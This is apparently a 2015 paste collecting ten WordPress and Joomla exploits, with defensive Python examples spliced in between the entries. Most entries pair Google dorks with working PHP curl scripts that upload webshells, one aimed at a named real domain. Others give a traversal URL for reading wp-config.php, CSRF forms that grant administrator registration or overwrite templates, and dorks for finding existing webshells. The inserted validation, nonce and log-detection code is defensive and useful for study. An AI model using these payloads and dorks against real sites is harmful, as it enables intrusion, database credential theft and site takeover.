10 Latest Exploit
Kyfx
Oct 5th, 2015
#1. Exploit Title: WordPress Font Uploader Shell Upload
Google Dork : inurl:/wp-content/plugins/font-uploader/
code===>
<?php

$uploadfile="yourshellname.php.ttf";
$ch = curl_init("http://www.yourtarget.com/wp-content/plugins/font-uploader/font-upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('font'=>"@$uploadfile",
'Submit'=>'submit'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>
========================================================
#2. Exploit Title: WordPress plugin Arbitrary File Upload (All Versions)
Google Dork: inurl:assets/uploadify/ site:.com [use your brain for dorking]
==> after going to your desired site you will find a file/folder [uploadify]; you need to click there
sample==>http://www.yourtarget.com/assets/themes/plugins/uploadify/uploadify.php
code==>
<?php
$uploadfile="yourshell.php";

$ch = curl_init("http://www.abhaya.org/assets/themes/plugins/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>
==========================================================
#3. Exploit Title: WordPress Atom Theme Arbitrary File Upload
Google Dork : inurl:"/wp-content/themes/atom/"
code==>
<?php
$uploadfile="yourshell.php";

$ch = curl_init("http://www.yourtarget.com/wp-content/themes/atom/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

Shell Access : http://www.yourtarget.com/wp-content/themes/atom/uploadify/uploads/randomnumber[your shellname].php
=============================================================
#4. Exploit Title: WordPress theme soulmedic Arbitrary File Download Vulnerability
Google Dork: inurl:"/wp-content/themes/soulmedic/"
http://www.yourtarget.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
===> you will find the database password/name of that server
================================================================
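The #4 entry works because the image handler joins an untrusted `img` parameter onto a directory and never checks where the result ends up. The following is an added example written for this page, not code from the paste or from any WordPress plugin; the base directory, the extension list and the function name are assumptions. It shows the containment check a defender expects such a handler to perform: decode once, refuse NUL bytes, absolute paths and any `..` segment, allowlist the extension, then canonicalise and confirm the path is still below the root.

```python
import os
import posixpath
from urllib.parse import unquote

# Constructed base directory for this example; assumed layout, not from any real site.
IMAGE_ROOT = "/var/www/html/wp-content/uploads/images"
ALLOWED_IMAGE_EXT = {".png", ".jpg", ".jpeg", ".gif", ".webp"}


def resolve_image_path(img_param: str, root: str = IMAGE_ROOT):
    """Map an untrusted `img` request parameter to a file under `root`.

    Returns the absolute path to serve, or None when the request must be refused
    (traversal, absolute path, NUL byte, or a non-image extension).
    """
    # Decode percent-encoding exactly once, then reject NUL, which truncates C-string paths.
    candidate = unquote(img_param)
    if "\x00" in candidate:
        return None
    # Backslashes act as separators on Windows hosts; normalise them as well.
    candidate = candidate.replace("\\", "/")
    # A relative image name is never absolute and never climbs a directory.
    if candidate.startswith("/") or ".." in candidate.split("/"):
        return None
    # Extension allowlist applied to the final path component.
    ext = posixpath.splitext(candidate)[1].lower()
    if ext not in ALLOWED_IMAGE_EXT:
        return None
    # Canonicalise (symlinks, redundant separators) and confirm the result stays under root.
    root_real = os.path.realpath(root)
    target = os.path.realpath(os.path.join(root_real, candidate))
    if os.path.commonpath([root_real, target]) != root_real:
        return None
    return target
```

The `..` rejection is deliberately redundant with the `commonpath` check: the first stops the request early and is easy to log on, the second catches anything that survives normalisation, including symlinks inside the upload directory that point elsewhere.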
#5. Exploit Title: PHP File Upload Vulnerability
Google Dork: inurl:images/jupload.php;guest100;guest100
http://www.yourtarget.com/images/jupload.php;guest100;guest100 [you need to remove this ;guest100;guest100]
http://www.yourtarget.com/images/jupload.php [after removing ;guest100;guest100]
if you find an uploading option then you can upload your shell
shell access==>http://www.yourtarget.com/images/shell.php
==================================================================
#6. Exploit Title: Hades+ Framework Add Administrator
Google Dorks (multiple): inurl:/wp-content/themes/appius/
inurl:/wp-content/themes/Consultant/
inurl:/wp-content/themes/appius1/
inurl:/wp-content/themes/archin/
inurl:/wp-content/themes/averin/
inurl:/wp-content/themes/dagda/
inurl:/wp-content/themes/echea/
inurl:/wp-content/themes/felici/
inurl:/wp-content/themes/kmp/
inurl:/wp-content/themes/kmp2/
inurl:/wp-content/themes/liberal/
inurl:/wp-content/themes/liberal-media-bias/
inurl:/wp-content/themes/linguini/
inurl:/wp-content/themes/livewire/
inurl:/wp-content/themes/majestics/
inurl:/wp-content/themes/mathis/
inurl:/wp-content/themes/mazine/
inurl:/wp-content/themes/Orchestra/
inurl:/wp-content/themes/shopsum/
inurl:/wp-content/themes/shotzz/
inurl:/wp-content/themes/test/
inurl:/wp-content/themes/Viteeo/
inurl:/wp-content/themes/vithy/
inurl:/wp-content/themes/yvora/
inurl:/wp-content/themes/sodales/
Exploit:
<form action="http://www.yourtarget.com/wp-content/themes/[themename,i mean:/appius//Consultant//archin/etc etc]/hades_framework/option_panel/ajax.php" method="POST">
<input name="values[0][name]" value="users_can_register">
<input name="values[0][value]" value="1">
<input name="values[1][name]" value="admin_email">
<input name="values[1][value]" value="{%YOUR_EMAIL}">
<input name="values[2][name]" value="default_role">
<input name="values[2][value]" value="administrator">
<input name="action" value="save">
<input type="submit" value="Submit">
</form>
Process==>
1. Change [themename,i mean:/appius//Consultant//archin/etc etc] to the vulnerable theme, and [YOUR_EMAIL] to your email address.
sample==>http://www.yourtarget.com/wp-content/themes/[vulnerable themename]/hades_framework/option_panel/ajax.php
2. Go to http://www.yourtarget.com/wp-login.php?action=register [you will see the registration form].
3. Choose your username & email address and register.
4. Go to your email; you will find your password.
5. Then login & upload your shell.
===============================================================
#7. Exploit Title: WordPress Dandelion Theme Arbitrary File Upload
Google Dork: inurl:/wp-content/themes/dandelion/
Code==>
<?php
$uploadfile="yourshell.php";
$ch = curl_init("http://www.yourshell.com/wp-content/themes/dandelion/functions/upload-handler.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
shell link=> http://www.yourshell.com/uploads/[year]/[month]/your_shell.php
=====================================================================
#8. Exploit Title: WordPress Satoshi Theme Arbitrary File Upload
Google Dork: inurl:/wp-content/satoshi/dandelion/
Code==>
<?php
$uploadfile="yourshell.php";
$ch = curl_init("http://www.yourshell.com/wp-content/themes/satoshi/functions/upload-handler.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
========================================================================
#8. Exploit Title: Mosets Tree 2.1.6 (Joomla) Template Overwrite CSRF
<?php
/**
* Mosets Tree 2.1.6 (Joomla) Template Overwrite CSRF
* 3 October 2010
* jdc
*
* How it works - admin template form has no nonce
* How to exploit - get a logged in admin to click the wrong link ;)
* Patched in 2.1.7
*/
// change these
$target = 'http://localhost/joomla';
$exploit = '<?php echo phpinfo(); ?>';
/* page - any one of:
page_addCategory
page_addListing
page_advSearchRedirect
page_advSearchResults
page_advSearch
page_claim
page_confirmDelete
page_contactOwner
page_errorListing
page_error
page_gallery
page_image
page_index
page_listAlpha
page_listing
page_listListings
page_ownerListing
page_print
page_recommend
page_replyReview
page_reportReview
page_report
page_searchByResults
page_searchResults
page_subCatIndex
page_usersFavourites
page_usersReview
page_writeReview
sub_alphaIndex
sub_images
sub_listingDetails
sub_listings
sub_listingSummary
sub_map
sub_reviews
sub_subCats
*/
$page = 'page_print';
// don't change these
$path = '/administrator/index.php';
$data = array(
'pagecontent' => $exploit,
'template' => 'm2',
'option' => 'com_mtree',
'task' => 'save_templatepage',
'page' => $page
);
?>
<html>
<body>
<?php if (@$_GET['iframe']) : ?>
<form id="csrf" action="<?php echo $target.$path; ?>" method="post">
<?php foreach ($data as $k => $v) : ?>
<input type="text" value="<?php echo htmlspecialchars($v); ?>"
name="<?php echo $k; ?>" />
<?php endforeach; ?>
<script type="text/javascript">
document.forms[0].submit();
</script>
</form>
<?php else : ?>
<h1>Mosets Tree 2.1.6 Template Overwrite CSRF Exploit</h1>
<p>If you were logged in as admin, you just got owned!</p>
<div style="display:none">
<iframe width="1" height="1" src="<?php __FILE__; ?>?iframe=1"></iframe>
</div>
<?php endif; ?>
</body>
</html>
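Both the Hades framework option panel (#6) and the Mosets Tree template form above fail for the same reasons: the endpoint does not verify who is asking, does not carry a per-user, per-action nonce, and lets the client name which setting is written. The following is an added example written for this page, not code from either project; it models a hardened option-save handler in Python (the request and session dictionaries, the `WRITABLE_OPTIONS` allowlist and the nonce window are assumptions). It shows the three checks in the order a defender wants them: capability, nonce in constant time, then an allowlist that refuses `users_can_register`, `admin_email` and `default_role` no matter who submits them.

```python
import hashlib
import hmac
import time
from typing import Dict, Optional

# Options the panel is allowed to write. Everything else is refused regardless of caller.
# Constructed allowlist for this example.
WRITABLE_OPTIONS = {"theme_color", "footer_text", "logo_url"}
NONCE_LIFETIME = 12 * 3600  # seconds per nonce window (assumed; WordPress uses a similar scheme)


def issue_nonce(secret: bytes, user_id: int, action: str, now: Optional[int] = None) -> str:
    """Token bound to user, action and time window: an attacker page cannot forge it."""
    tick = (now if now is not None else int(time.time())) // NONCE_LIFETIME
    msg = f"{user_id}|{action}|{tick}".encode()
    return hmac.new(secret, msg, hashlib.sha256).hexdigest()[:32]


def verify_nonce(secret: bytes, user_id: int, action: str, token: str, now: Optional[int] = None) -> bool:
    """Accept the current or the previous window; compare in constant time."""
    t = now if now is not None else int(time.time())
    for window in (t, t - NONCE_LIFETIME):
        if hmac.compare_digest(issue_nonce(secret, user_id, action, window), token):
            return True
    return False


def save_options(session: Dict, form: Dict[str, str], secret: bytes,
                 now: Optional[int] = None) -> Dict[str, object]:
    """Model of a hardened option_panel/ajax.php. `form` uses the values[i][name] layout from #6."""
    # 1. Authentication and authorization: anonymous or low-privilege callers stop here.
    user = session.get("user")
    if user is None or "manage_options" not in user.get("caps", ()):
        return {"status": "forbidden"}
    # 2. CSRF defence: an admin who merely loads an attacker page sends no valid nonce.
    if not verify_nonce(secret, user["id"], "save_options", form.get("_nonce", ""), now):
        return {"status": "bad_nonce"}
    # 3. Allowlist: the client may name options, but only listed ones are ever written.
    updates = {}
    i = 0
    while f"values[{i}][name]" in form:
        name = form[f"values[{i}][name]"]
        if name not in WRITABLE_OPTIONS:
            return {"status": "rejected", "option": name}
        updates[name] = form[f"values[{i}][value]"]
        i += 1
    return {"status": "saved", "updated": updates}
```

The Mosets case maps onto the same handler with `action = "save_templatepage"` and `pagecontent` outside the allowlist; the nonce check alone would have stopped the cross-site form, and the allowlist would have stopped a logged-in but unprivileged user.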
#9. Exploit Title: WordPress potential theme upload vulns
1. dork: inurl:/wp-content/themes/nuance/
exploit: /functions/jwpanel/scripts/valums_uploader/php.php

2. dork: inurl:/wp-content/themes/lightspeed/
exploit: /framework/_scripts/valums_uploader/php.php

3. dork: inurl:/wp-content/themes/saico/
exploit: /framework/_scripts/valums_uploader/php.php

4. dork: inurl:/wp-content/themes/eptonic/
exploit: /functions/jwpanel/scripts/valums_uploader/php.php

5. dork: inurl:/wp-content/themes/skinizer/
exploit: /framework/_scripts/valums_uploader/php.php

6. dork: inurl:/wp-content/themes/area53/
exploit: /framework/_scripts/valums_uploader/php.php

7. dork: inurl:/wp-content/themes/blinc/
exploit: /framework/_scripts/valums_uploader/php.php

csrf from html:

<form enctype="multipart/form-data"
action="http://www.yourtarget.com/wp-content/themes/nuance/functions/jwpanel/scripts/valums_uploader/php.php" method="post">
<input type="jpg" name="url" value="./" /><br />
Please choose a file: <input name="qqfile" type="file" /><br />
<input type="submit" value="upload" />
</form>
If the URL allows you to upload your shell then you can upload it; if it says any #Error then find another one.
shell link==>
http://www.yourtarget.com/wp-content/themes/yourthemename/yourshellname.php
http://www.yourtarget.com/wp-content/uploads/shell.php
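Every upload entry on this page (#1, #2, #3, #5, #7, #8 and #9) relies on a handler that trusts the client's filename: `uploadify.php`, `upload-handler.php` and the valums `php.php` store `yourshell.php` as given, and #1 relies on `yourshellname.php.ttf` passing a suffix check while still being run as PHP by servers that evaluate every extension segment. The following is an added example written for this page, not code from the paste or from any of those uploaders; the `ALLOWED_TYPES` table, the destination directory and the function name are assumptions. It shows the validation a defender expects: strip client-supplied directories, refuse any executable segment anywhere in the name, allowlist the final extension, check the content's magic bytes against the declared type, and let the server choose the stored name.

```python
import os
import secrets
from dataclasses import dataclass
from typing import Optional

# Final extension -> accepted magic-byte prefixes. Constructed for this example;
# a real handler carries only the types it genuinely serves.
ALLOWED_TYPES = {
    ".ttf": (b"\x00\x01\x00\x00", b"true"),
    ".otf": (b"OTTO",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
}

# Segments that must never appear anywhere in the name, even as an inner part,
# because servers with multi-extension handling may execute "shell.php.ttf" as PHP.
EXECUTABLE_SEGMENTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar",
                       "htaccess", "cgi", "pl", "sh"}


@dataclass
class UploadDecision:
    accepted: bool
    reason: str
    stored_name: Optional[str] = None


def validate_upload(client_filename: str, content: bytes,
                    dest_dir: str = "/srv/uploads") -> UploadDecision:
    """Decide whether an upload may be stored. `dest_dir` is assumed to sit outside
    the web root (or to have script execution disabled) so a stored file is data only."""
    # Drop any directory part the client supplied (C:\x\y.ttf, ../../y.ttf).
    base = os.path.basename(client_filename.replace("\\", "/"))
    if not base or "\x00" in base:
        return UploadDecision(False, "empty or NUL in filename")
    segments = base.lower().split(".")
    if len(segments) < 2:
        return UploadDecision(False, "no extension")
    # Double extensions such as shell.php.ttf, and dotfiles such as .htaccess, stop here.
    if any(seg in EXECUTABLE_SEGMENTS for seg in segments[1:]):
        return UploadDecision(False, "executable extension segment")
    ext = "." + segments[-1]
    if ext not in ALLOWED_TYPES:
        return UploadDecision(False, f"extension {ext} not allowed")
    # The declared type must agree with the bytes actually sent.
    if not content.startswith(ALLOWED_TYPES[ext]):
        return UploadDecision(False, "content does not match declared type")
    # The server picks the stored name; the client's name never reaches the filesystem.
    stored = secrets.token_hex(16) + ext
    return UploadDecision(True, "ok", os.path.join(dest_dir, stored))
```

The magic-byte check matters even with the allowlist: a renamed PHP file named `logo.png` has a valid extension but the wrong first bytes, and the random server-side name removes the predictable `uploads/shell.php` location that every entry above depends on.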
#10. Exploit Title: For Noobs [Dorking for shells]
b374k m1n1
Quote:
google dork :
intitle:b374k m1n1 inurl:wp-content
intitle:"index of /" "b374k.php"


Dorking for the wso shell
Quote:
google dork :
intitle:"Index of /uploads" "wso.php"
intitle:"index of /" "wso.php"


Dorking for the Madspot shell
This shell has no password by default and is indexed by Google, so we can use dorking to find it.
Quote:
google dork :
intitle:Madspot Security site:com


Dorking for the 1n73ct10n shell
Quote:
google dork :
intitle:1n73ct10n inurl:wp-content
intitle:"index of /" "1n73ct10n.php"
###########################################################################################
and you can find many tutorials on Google for JCE/Revslider/Com_user/comfabrik/webdav/Jdownload.
But if you are a pro CMS/backend web developer then you can make your own exploit for Joomla/WordPress/Drupal/WooCommerce etc., but you need a very clear idea of web apps and web app development.
A website is a huge thing [plugin/theme/component/widget/framework: Joomla, WordPress, Drupal, Bootstrap, phpBB, etc.]; many high-profile backend developers will reward you.
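Read from the other side, this paste is a compact list of request shapes worth alerting on: POSTs to the theme and plugin upload handlers it names, GETs for double-extension `.php.*` files, `..` in a query parameter (#4), POSTs to `hades_framework/option_panel/ajax.php` (#6), and requests for the webshell filenames in #10. The following is an added example written for this page, not part of the paste; the log lines are constructed in Apache combined format with RFC 5737 documentation addresses, and the rule names and regexes are assumptions. It scans the sample and returns one hit per matching rule so the result can feed a SIEM rule or a quick triage script.

```python
import re
from typing import List, Tuple

# Constructed access-log lines illustrating the request shapes this paste relies on.
# Addresses are documentation ranges; nothing here comes from a real server.
SAMPLE_LOG = r"""
203.0.113.5 - - [05/Oct/2015:10:01:02 +0000] "POST /wp-content/plugins/font-uploader/font-upload.php HTTP/1.1" 200 312 "-" "curl/7.38.0"
203.0.113.5 - - [05/Oct/2015:10:01:09 +0000] "GET /wp-content/plugins/font-uploader/fonts/shell.php.ttf HTTP/1.1" 200 4410 "-" "curl/7.38.0"
198.51.100.7 - - [05/Oct/2015:10:03:44 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 200 2890 "-" "Mozilla/5.0"
198.51.100.7 - - [05/Oct/2015:10:04:01 +0000] "POST /wp-content/themes/atom/uploadify/uploadify.php HTTP/1.1" 200 58 "-" "Mozilla/5.0"
192.0.2.9 - - [05/Oct/2015:10:05:17 +0000] "POST /wp-content/themes/archin/hades_framework/option_panel/ajax.php HTTP/1.1" 200 14 "-" "Mozilla/5.0"
192.0.2.9 - - [05/Oct/2015:10:05:20 +0000] "GET /wp-login.php?action=register HTTP/1.1" 200 3301 "-" "Mozilla/5.0"
192.0.2.10 - - [05/Oct/2015:10:06:00 +0000] "GET /wp-content/uploads/wso.php HTTP/1.1" 200 9031 "-" "Mozilla/5.0"
192.0.2.11 - - [05/Oct/2015:10:07:00 +0000] "GET /wp-content/themes/atom/style.css HTTP/1.1" 200 7120 "-" "Mozilla/5.0"
"""

# Apache combined format: client ip, identd, user, [time], "METHOD target PROTO", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Each rule is (label, regex over the string "METHOD target").
RULES = [
    # Upload handlers named in #1, #2, #3, #5, #7, #8 and #9.
    ("upload-endpoint", re.compile(
        r"^POST \S*/(uploadify/uploadify\.php|font-uploader/font-upload\.php|"
        r"functions/upload-handler\.php|valums_uploader/php\.php|jupload\.php)(\?|$)")),
    # A .php segment followed by another extension, as in #1's shell.php.ttf.
    ("double-extension-php", re.compile(r"^\S+ \S*\.php\.[A-Za-z0-9]+(\?|$)")),
    # Raw or encoded '..' at the start of a query-parameter value, as in #4.
    ("path-traversal-param", re.compile(r"^\S+ \S*[?&][^ ]*=(\.\./|\.\.%2[fF]|%2e%2e)", re.IGNORECASE)),
    # Theme option panel written to directly, as in #6.
    ("theme-option-panel-write", re.compile(r"^POST \S*/hades_framework/option_panel/ajax\.php")),
    # Webshell filenames dorked for in #10; name-based, so expect some noise.
    ("known-webshell-name", re.compile(r"^\S+ \S*/(b374k|wso|1n73ct10n|madspot)[^/]*\.php(\?|$)", re.IGNORECASE)),
]


def scan_access_log(text: str) -> List[Tuple[str, str, str]]:
    """Return (ip, rule label, request target) for every rule each line matches."""
    hits = []
    for line in text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        probe = f"{m['method']} {m['target']}"
        for label, rx in RULES:
            if rx.search(probe):
                hits.append((m["ip"], label, m["target"]))
    return hits
```

The two hits from `203.0.113.5` are the pair worth correlating: an upload POST followed within seconds by a GET for a `.php.ttf` under the same plugin is the #1 sequence end to end, whereas either event on its own could be a legitimate font upload or a scanner probe.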